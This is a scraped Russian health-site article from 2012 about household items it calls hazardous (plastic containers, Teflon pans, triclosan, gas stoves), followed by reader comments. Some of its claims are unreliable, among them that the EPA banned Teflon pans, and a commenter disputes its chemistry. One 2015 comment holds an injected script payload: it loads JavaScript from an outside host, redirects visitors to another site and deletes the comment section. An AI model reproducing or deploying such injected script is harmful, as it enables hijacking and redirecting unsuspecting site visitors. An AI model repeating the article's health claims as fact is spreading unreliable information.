Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Замена вместо измены  >>  Замена вместо измены
 
Обратная связь
 

Замена вместо измены

Размер шрифта
14 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Не только эмоции вносят перемены в нашу жизнь, но и вполне здравый рассудок. В этой части - наш рассказ о разных вещах в доме, которые представляют опасность и подскажем, на что их следует заменить.

1

Пластиковая посуда

Проблема: большинство пластиковой посуды содержит вредный для организма бисфенол А. Кроме того, разогрев пищи в пластиковых контейнерах опасен вдвойне: при нагревании бисфенол А выделяется интенсивнее.

Решение: разогревайте еду в микроволновке только в специальной посуде. Пластиковые контейнеры замените на стеклянные. Используйте стеклянные контейнеры для хранения продуктов и приготовления еды.

1

Тефлоновое покрытие

Проблема: тефлон – на сегодня самое популярное антипригарное покрытие. Чаще всего в повседневной жизни, мы встречаем тефлоновое покрытие на сковородках и кастрюлях. Они действительно очень удобны, пища не прилипает даже без масла, и получается все вкусно. После использования, такая посуда легко чистится.
Однако в ходе научных исследований, было обнаружено, что перфтороктановая кислота, основной компонент антипригарного покрытия, является опасной для здоровья. Тефлоновое покрытие в своем составе содержит токсические вещества, которые при нагреве посуды начинают выделяться в воздух.

Американское федеральное агентство по защите окружающей среды (EPA) наложило запрет на сковороды с тефлоновым покрытием, т.к. в ходе лабораторных экспериментов с животными было доказано, что вещества, содержащиеся в составе тефлонового покрытия способствовали возникновению рака печени, низкому весу новорожденных, вызывали проблемы с иммунной системой и развитием.

Решение: старайтесь избегать приготовления в посуде с тефлоновым покрытием. Посуду с тефлоновым покрытием замените на посуду с керамическим покрытием.

Моющие средства c триклозаном

Проблема: вместо того, чтобы убивать бактерии, регулярное использование антибактериальных средств с триклозаном препятствует росту бактерий таким образом, что без его воздействия остается большое количество устойчивых бактерий.

Проблема: сочетание триклозана и обычных химических веществ из воды из-под крана может создать опасные соединения - диоксины и хлороформ.
Триклозан связывают с отравлением дыхательных путей и печени, а также он может повлиять на работу щитовидной железы. EPA относит триклозан к пестицидам.

Решение: используйте средства без триклозана.

Газовая плита

Проблема: при использовании газовой плиты, сжигается кислород и образуется углекислый газ.

Газовые плиты в обычных монолитных, панельных, монолитно-кирпичных домах заменить на электрическую плиту проблематично. Дело в том, что проводка на газовые плиты не рассчитана на подачу энергии на электрическую плиту, ведь по ней идет газ, а не электричество. Следовательно, придется тянуть отдельный кабель с электроэнергией специально для электрической плиты. Но даже если это сделать, труба с подачей газа все равно останется. Эту трубу конечно можно перекрыть, но опасность останется, так как в трубе останется газ.

Решение: использовать электрическую плиту.
 


Сюжеты оп теме:
Замена вместо измены

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

14 февраля 2012 в 12:19

Цитировать   |   Пожаловаться

Что означает эта корявая фраза в вашей статье:

"Дело в том, что проводка на газовые плиты не рассчитана на подачу энергии на электрическую плиту, ведь по ней идет газ, а не электричество." ?

Вы что, уж совсем за дебилов людей-то держите: неужели кто-то сообразит к газовой трубе подключать электроплиту? Хоть бы сформулировали по-русски: "поскольку новая плита будет электрической, необходимо подведение к ней отдельного электрокабеля и заглушка газовых труб, не требующихся для новой плиты. Для этого надо обратиться к специалистам".
И что это за перлы: "кабель с электроэнергией"? Вы что, не знаете, что есть термин "электрический кабель"?

Проблема-то в другом: зарегистрировать наличие электроплиты, поскольку плата за электричество в домах с электроплитами по другим тарифам, меньше, чем в домах с газовыми плитами. А если не отметить где надо про плиту, то и за газ все равно платить придется! Тут не все так просто!

2 - helena

14 февраля 2012 в 12:49

Цитировать   |   Пожаловаться

Цитирую: " Проблема: большинство пластиковой посуды содержитвредный для организма бисфенол А. Кроме того, разогрев пищи впластиковых контейнерах опасен вдвойне: при нагревании бисфенол Авыделяется интенсивнее."

Да когда же Вам надоест пугать народ пластиками! Научите его читать обозначения на донышке посуды! Бисфенол А содержится только в поликарбонате, поливинилхлориде  (эта посуда не предназначена для использования в микроволновках) и эпоксилных смолах (из них вообще не делают пищевую посуду)

Все, что можно использовать в микроволновках - смотреть соотсетствующее обозначение микроволн на донышке - не содержит бисфенол никакой, не только А. Это полиэтилен, полипропилен. Обозначаются буквами HDPE или PE-HD, и LDPE или PE-LD для полиэтилена высокой и низкой плотности соответственно и РР если полипропилен.

И еще: перфтороктановая кислота не является основным компонентом антипригарного покрытия, которое выполняется из ПОЛИТЕТРАФТОРЭТИЛЕНА. Она может (как и многие другие летучие продукты разложения) образоваться только при условии, что сковорода без содержимого будет час и более стоять на включенной плите, то есть если захотеть сжечь сковороду. А сам пластик не вреден, на Вашем же сайте есть информация о том, что из политетрафторэтилена изготавливают протезы кровеносных сосудов! Это самый биологически инертный и долговечный пластик!

Гость 14 февраля 2012 в 12:19
есть термин "электрический кабель
 Спасибо за внимание, Вы правы, "электрический кабель" действительно куда правильнее "кабеля с электроэнергией". 

helena 14 февраля 2012 в 12:49
перфтороктановая кислота не является основным компонентом антипригарного покрытия
 Тем не менее, Американское федеральное агентство по защите окружающей среды (EPA) наложило запрет на сковороды с тефлоновым покрытием. 
Программа делится с вами этими фактами. Решение принимать будет каждый самостоятельно. 

5 - helena

15 февраля 2012 в 14:46

Цитировать   |   Пожаловаться

Вся эта эпопея с гонениями на тефлоновые сковороды вполне похожа на заказ производителей посуды с другим покрытием. Сами же в передаче разоблачали исследования о красном вине. Так и тут со временем обнаружится заказчик, о котором сейчас умалчивается.

6 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.